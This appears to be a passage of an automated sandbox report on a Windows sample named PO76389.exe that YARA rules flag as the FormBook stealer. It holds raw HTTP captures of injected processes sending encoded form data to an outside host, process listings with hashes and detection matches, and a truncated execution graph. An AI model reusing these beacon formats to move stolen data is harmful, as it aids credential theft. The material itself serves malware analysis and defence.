                                                  Data Ascii: prutfR_P=OjQmhLDtwrBa+4iLZvecvFdEQqa6AeQpwejtdp+7fI5fgj3ZsELDk7pA6lIU/sG9/SZVCIR2PYi5bXzBIImRgKR0Cgbqc24Z+3MVLrpmLWDs4/vBv0HT8uVlqF0GLqaf91Fr6g7t96k92i0Jp1SgYMshjL5I9TfHSFXMrVeDxKpdKAMu+/kOx2vdCJ7ysOywVlDDopdJTqo+lfDDDP6NGK32oFgT
                                                   Sep 16, 2024 09:41:04.709839106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:04 GMT
                                                  Connection: close
                                                  Content-Length: 4948
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                   Sep 16, 2024 09:41:04.709862947 CEST | 224 | IN | Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
                                                   Sep 16, 2024 09:41:04.709878922 CEST | 1236 | IN | Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79
                                                  Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
                                                   Sep 16, 2024 09:41:04.709893942 CEST | 1236 | IN | Data Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65
                                                  Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
                                                   Sep 16, 2024 09:41:04.709908962 CEST | 1235 | IN | Data Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62
                                                  Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right">


                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   35 | 192.168.2.5 | 49747 | 62.149.128.40 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   Sep 16, 2024 09:41:06.579729080 CEST | 1819 | OUT | POST /f3w9/ HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.fimgroup.net
                                                  Referer: http://www.fimgroup.net/f3w9/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4f 6a 51 6d 68 4c 44 74 77 72 42 61 2b 34 69 4c 5a 76 65 63 76 46 64 45 51 71 61 36 41 65 51 70 77 65 6a 74 64 70 2b 37 66 49 78 66 38 41 2f 5a 74 6a 2f 44 69 4c 70 41 77 46 49 56 2f 73 48 6e 2f 57 31 52 43 49 56 41 50 62 57 35 55 53 2f 42 5a 70 6d 52 33 61 52 30 61 51 62 70 42 47 34 70 2b 33 63 4a 4c 72 35 6d 4c 57 44 73 34 38 33 42 72 6d 2f 54 37 65 56 6d 74 46 30 38 50 71 62 77 39 31 4d 55 36 67 50 54 39 75 51 39 32 42 63 4a 73 48 4b 67 46 38 73 6e 33 72 34 4f 39 54 44 55 53 44 7a 32 72 56 43 70 78 49 35 64 4a 78 78 77 74 39 30 32 6c 41 6a 4f 45 5a 47 65 74 65 79 52 63 54 62 48 69 36 78 63 58 37 55 74 6f 70 50 6a 47 4d 43 49 64 4f 48 52 75 79 68 4a 31 67 4e 6a 46 61 6c 63 49 2f 48 43 42 66 31 44 31 31 73 50 37 73 6d 44 31 51 46 71 33 79 4c 53 39 38 6a 44 49 36 4e 6a 74 61 69 6c 72 62 76 39 69 78 4c 55 71 2f 70 48 51 54 68 4e 78 58 58 45 71 48 7a 30 75 6c 72 68 7a 44 35 33 70 56 62 39 2b 54 38 7a 78 7a 6b 4f 55 44 5a 74 36 72 45 67 54 48 68 2b 57 4a 68 57 79 68 4c 46 56 [TRUNCATED]
                                                   Data Ascii: prutfR_P= [TRUNCATED]
                                                   Sep 16, 2024 09:41:07.235972881 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:06 GMT
                                                  Connection: close
                                                  Content-Length: 4948
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                  Sep 16, 2024 09:41:07.235990047 CEST | 1236 | IN
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                  Sep 16, 2024 09:41:07.236000061 CEST | 1236 | IN
                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                  Sep 16, 2024 09:41:07.236010075 CEST | 1236 | IN
                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                  Sep 16, 2024 09:41:07.236021042 CEST | 223 | IN
                                                  Data Ascii: tory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  36 | 192.168.2.5 | 49748 | 62.149.128.40 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Sep 16, 2024 09:41:09.210674047 CEST | 524 | OUT | GET /f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:41:09.875648975 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:09 GMT
                                                  Connection: close
                                                  Content-Length: 5108
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                  Sep 16, 2024 09:41:09.875668049 CEST | 1236 | IN
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                  Sep 16, 2024 09:41:09.875679970 CEST | 448 | IN
                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                  Sep 16, 2024 09:41:09.875689030 CEST | 1236 | IN
                                                  Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
                                                  Sep 16, 2024 09:41:09.875705957 CEST | 1171 | IN
                                                  Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5



                                                  Target ID:0
                                                  Start time:03:37:02
                                                  Start date:16/09/2024
                                                  Path:C:\Users\user\Desktop\PO76389.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\PO76389.exe"
                                                  Imagebase:0x4b0000
                                                  File size:756'224 bytes
                                                  MD5 hash:F28830224D4ED5B9B9B16FB45D5FD569
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:03:37:03
                                                  Start date:16/09/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\PO76389.exe"
                                                  Imagebase:0x1a0000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:37:39
                                                  Start date:16/09/2024
                                                  Path:C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe"
                                                  Imagebase:0x920000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:03:37:40
                                                  Start date:16/09/2024
                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                  Imagebase:0x770000
                                                  File size:22'016 bytes
                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:7
                                                  Start time:03:37:54
                                                  Start date:16/09/2024
                                                  Path:C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe"
                                                  Imagebase:0x920000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:03:38:11
                                                  Start date:16/09/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff79f9e0000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:3%
                                                    Dynamic/Decrypted Code Coverage:2.4%
                                                    Signature Coverage:11.2%
                                                    Total number of Nodes:1646
                                                    Total number of Limit Nodes:144
104125->104131 104126->104131 104142 4b39e8 48 API calls 2 library calls 104128->104142 104130 524586 104132 4b39ba Shell_NotifyIconW 104131->104132 104132->104133 104133->104104 104134->104099 104136 4d010a 48 API calls 104135->104136 104137 4b7b93 104136->104137 104138 4ba6f8 48 API calls 104137->104138 104139 4b390e 104138->104139 104139->104116 104139->104117 104140->104131 104141->104125 104142->104130 104143 4d6a80 104144 4d6a8c _flsall 104143->104144 104180 4d8b7b GetStartupInfoW 104144->104180 104146 4d6a91 104182 4da937 GetProcessHeap 104146->104182 104148 4d6ae9 104149 4d6af4 104148->104149 104267 4d6bd0 47 API calls 3 library calls 104148->104267 104183 4d87d7 104149->104183 104152 4d6afa 104153 4d6b05 __RTC_Initialize 104152->104153 104268 4d6bd0 47 API calls 3 library calls 104152->104268 104204 4dba66 104153->104204 104156 4d6b14 104157 4d6b20 GetCommandLineW 104156->104157 104269 4d6bd0 47 API calls 3 library calls 104156->104269 104223 4e3c2d GetEnvironmentStringsW 104157->104223 104160 4d6b1f 104160->104157 104164 4d6b45 104236 4e3a64 104164->104236 104167 4d6b4b 104168 4d6b56 104167->104168 104271 4d1d7b 47 API calls 3 library calls 104167->104271 104250 4d1db5 104168->104250 104171 4d6b5e 104172 4d6b69 __wwincmdln 104171->104172 104272 4d1d7b 47 API calls 3 library calls 104171->104272 104254 4b3682 104172->104254 104175 4d6b7d 104176 4d6b8c 104175->104176 104273 4d2011 47 API calls _doexit 104175->104273 104274 4d1da6 47 API calls _doexit 104176->104274 104179 4d6b91 _flsall 104181 4d8b91 104180->104181 104181->104146 104182->104148 104275 4d1e5a 30 API calls 2 library calls 104183->104275 104185 4d87dc 104276 4d8ab3 InitializeCriticalSectionAndSpinCount 104185->104276 104187 4d87e1 104188 4d87e5 104187->104188 104278 4d8afd TlsAlloc 104187->104278 104277 4d884d 50 API calls 2 library calls 104188->104277 104191 4d87ea 104191->104152 104192 4d87f7 104192->104188 104193 4d8802 104192->104193 104279 4d7616 104193->104279 104196 4d8844 104287 
4d884d 50 API calls 2 library calls 104196->104287 104199 4d8823 104199->104196 104201 4d8829 104199->104201 104200 4d8849 104200->104152 104286 4d8724 47 API calls 4 library calls 104201->104286 104203 4d8831 GetCurrentThreadId 104203->104152 104205 4dba72 _flsall 104204->104205 104296 4d8984 104205->104296 104207 4dba79 104208 4d7616 __calloc_crt 47 API calls 104207->104208 104210 4dba8a 104208->104210 104209 4dbaf5 GetStartupInfoW 104214 4dbb0a 104209->104214 104219 4dbc33 104209->104219 104210->104209 104211 4dba95 _flsall @_EH4_CallFilterFunc@8 104210->104211 104211->104156 104212 4dbcf7 104303 4dbd0b RtlLeaveCriticalSection _doexit 104212->104303 104215 4dbb58 104214->104215 104217 4d7616 __calloc_crt 47 API calls 104214->104217 104214->104219 104215->104219 104221 4dbb98 InitializeCriticalSectionAndSpinCount 104215->104221 104222 4dbb8a GetFileType 104215->104222 104216 4dbc7c GetStdHandle 104216->104219 104217->104214 104218 4dbc8e GetFileType 104218->104219 104219->104212 104219->104216 104219->104218 104220 4dbcbb InitializeCriticalSectionAndSpinCount 104219->104220 104220->104219 104221->104215 104222->104215 104222->104221 104224 4e3c3e 104223->104224 104225 4d6b30 104223->104225 104342 4d7660 47 API calls __crtGetStringTypeA_stat 104224->104342 104230 4e382b GetModuleFileNameW 104225->104230 104228 4e3c64 _memmove 104229 4e3c7a FreeEnvironmentStringsW 104228->104229 104229->104225 104231 4e385f _wparse_cmdline 104230->104231 104232 4d6b3a 104231->104232 104233 4e3899 104231->104233 104232->104164 104270 4d1d7b 47 API calls 3 library calls 104232->104270 104343 4d7660 47 API calls __crtGetStringTypeA_stat 104233->104343 104235 4e389f _wparse_cmdline 104235->104232 104237 4e3a75 104236->104237 104238 4e3a7d __wsetenvp 104236->104238 104237->104167 104239 4d7616 __calloc_crt 47 API calls 104238->104239 104243 4e3aa6 __wsetenvp 104239->104243 104240 4e3afd 104241 4d28ca _free 47 API calls 104240->104241 104241->104237 104242 4d7616 __calloc_crt 47 API 
calls 104242->104243 104243->104237 104243->104240 104243->104242 104244 4e3b22 104243->104244 104247 4e3b39 104243->104247 104344 4e3317 47 API calls __cftoe2_l 104243->104344 104245 4d28ca _free 47 API calls 104244->104245 104245->104237 104345 4d7ab0 IsProcessorFeaturePresent 104247->104345 104249 4e3b45 104249->104167 104251 4d1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 104250->104251 104253 4d1e00 __IsNonwritableInCurrentImage 104251->104253 104368 4d1b2a 52 API calls __cinit 104251->104368 104253->104171 104255 5223b5 104254->104255 104256 4b369c 104254->104256 104257 4b36d6 745AC8D0 104256->104257 104369 4d2025 104257->104369 104261 4b3702 104381 4b32de SystemParametersInfoW SystemParametersInfoW 104261->104381 104263 4b370e 104382 4b374e GetCurrentDirectoryW 104263->104382 104266 4b373b 104266->104175 104267->104149 104268->104153 104269->104160 104273->104176 104274->104179 104275->104185 104276->104187 104277->104191 104278->104192 104280 4d761d 104279->104280 104282 4d765a 104280->104282 104283 4d763b Sleep 104280->104283 104288 4e3e5a 104280->104288 104282->104196 104285 4d8b59 TlsSetValue 104282->104285 104284 4d7652 104283->104284 104284->104280 104284->104282 104285->104199 104286->104203 104287->104200 104289 4e3e65 104288->104289 104294 4e3e80 __calloc_impl 104288->104294 104290 4e3e71 104289->104290 104289->104294 104295 4d889e 47 API calls __getptd_noexit 104290->104295 104292 4e3e90 RtlAllocateHeap 104293 4e3e76 104292->104293 104292->104294 104293->104280 104294->104292 104294->104293 104295->104293 104297 4d89a8 RtlEnterCriticalSection 104296->104297 104298 4d8995 104296->104298 104297->104207 104304 4d8a0c 104298->104304 104300 4d899b 104300->104297 104328 4d1d7b 47 API calls 3 library calls 104300->104328 104303->104211 104305 4d8a18 _flsall 104304->104305 104306 4d8a39 104305->104306 104307 4d8a21 104305->104307 104309 4d8a37 104306->104309 104315 4d8aa1 _flsall 104306->104315 104329 4d8e52 47 API calls 2 
library calls 104307->104329 104309->104306 104332 4d7660 47 API calls __crtGetStringTypeA_stat 104309->104332 104310 4d8a26 104330 4d8eb2 47 API calls 8 library calls 104310->104330 104313 4d8a4d 104316 4d8a54 104313->104316 104317 4d8a63 104313->104317 104314 4d8a2d 104331 4d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104314->104331 104315->104300 104333 4d889e 47 API calls __getptd_noexit 104316->104333 104318 4d8984 __lock 46 API calls 104317->104318 104322 4d8a6a 104318->104322 104321 4d8a59 104321->104315 104323 4d8a8e 104322->104323 104324 4d8a79 InitializeCriticalSectionAndSpinCount 104322->104324 104334 4d28ca 104323->104334 104325 4d8a94 104324->104325 104340 4d8aaa RtlLeaveCriticalSection _doexit 104325->104340 104329->104310 104330->104314 104332->104313 104333->104321 104335 4d28fc __dosmaperr 104334->104335 104336 4d28d3 RtlFreeHeap 104334->104336 104335->104325 104336->104335 104337 4d28e8 104336->104337 104341 4d889e 47 API calls __getptd_noexit 104337->104341 104339 4d28ee GetLastError 104339->104335 104340->104315 104341->104339 104342->104228 104343->104235 104344->104243 104346 4d7abb 104345->104346 104351 4d7945 104346->104351 104350 4d7ad6 104350->104249 104352 